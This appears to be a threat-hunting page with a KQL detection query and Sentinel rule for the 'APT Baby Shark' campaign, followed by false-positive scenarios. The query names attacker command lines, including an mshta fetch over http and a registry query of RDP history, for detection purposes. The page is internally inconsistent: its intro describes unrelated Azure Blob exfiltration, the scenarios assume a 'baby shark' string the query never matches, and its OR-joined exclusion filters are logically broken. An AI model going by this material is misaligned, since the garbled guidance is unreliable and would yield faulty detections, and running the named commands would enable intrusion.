Adversaries are leveraging Azure AD credentials in conjunction with Azure Blob Storage to exfiltrate data, mimicking legitimate user behavior to avoid detection. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify potential APT activity that evades traditional detection methods.
KQL Query
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine =~ @"reg query ""HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"""
or ProcessCommandLine startswith "powershell.exe mshta.exe http"
or ProcessCommandLine =~ "cmd.exe /c taskkill /im cmd.exe"
| top 100 by Timestamp desc
id: 26721b80-a9b7-4594-9b0f-ec21e5da1bc2
name: APT Baby Shark
description: |
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_babyshark.yml.
Questions via Twitter: @janvonkirchheim.
requiredDataConnectors:
- connectorId: MicrosoftThreatProtection
dataTypes:
- DeviceProcessEvents
query: |
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine =~ @"reg query ""HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"""
or ProcessCommandLine startswith "powershell.exe mshta.exe http"
or ProcessCommandLine =~ "cmd.exe /c taskkill /im cmd.exe"
| top 100 by Timestamp desc
| Sentinel Table | Notes |
|---|---|
DeviceProcessEvents | Ensure this data connector is enabled |
Scenario: Scheduled System Maintenance Task
Description: A legitimate scheduled task runs a script that includes the string “baby shark” in its comments or log messages.
Filter/Exclusion: process.name != "schtasks.exe" OR process.name != "task scheduler" or use a custom field like file.name != "maintenance_script.ps1"
Scenario: Admin Performing System Updates
Description: An administrator runs a PowerShell script to update system files, which includes the string “baby shark” in the script for documentation purposes.
Filter/Exclusion: process.name != "powershell.exe" OR user.name != "admin_account" or check for file.hash of known legitimate update scripts.
Scenario: Log File Rotation or Cleanup Job
Description: A log rotation job or cleanup script uses the term “baby shark” in its configuration or log entries as part of a naming convention.
Filter/Exclusion: process.name != "logrotate.exe" OR file.name != "log_cleanup_script.sh"
Scenario: Internal Security Training or Awareness Campaign
Description: A security team runs a training script or awareness campaign that includes the phrase “baby shark” as part of a phishing simulation or training exercise.
Filter/Exclusion: process.name != "training_script.py" OR user.name != "security_team"
Scenario: Legacy Tool or Script with Hardcoded Strings
Description: An old internal tool or script (e.g., old_tool.exe) contains the string “baby shark” in its codebase or configuration files.
Filter/Exclusion: file.name != "old_tool.exe" OR file.hash != "known_legitimate_hash"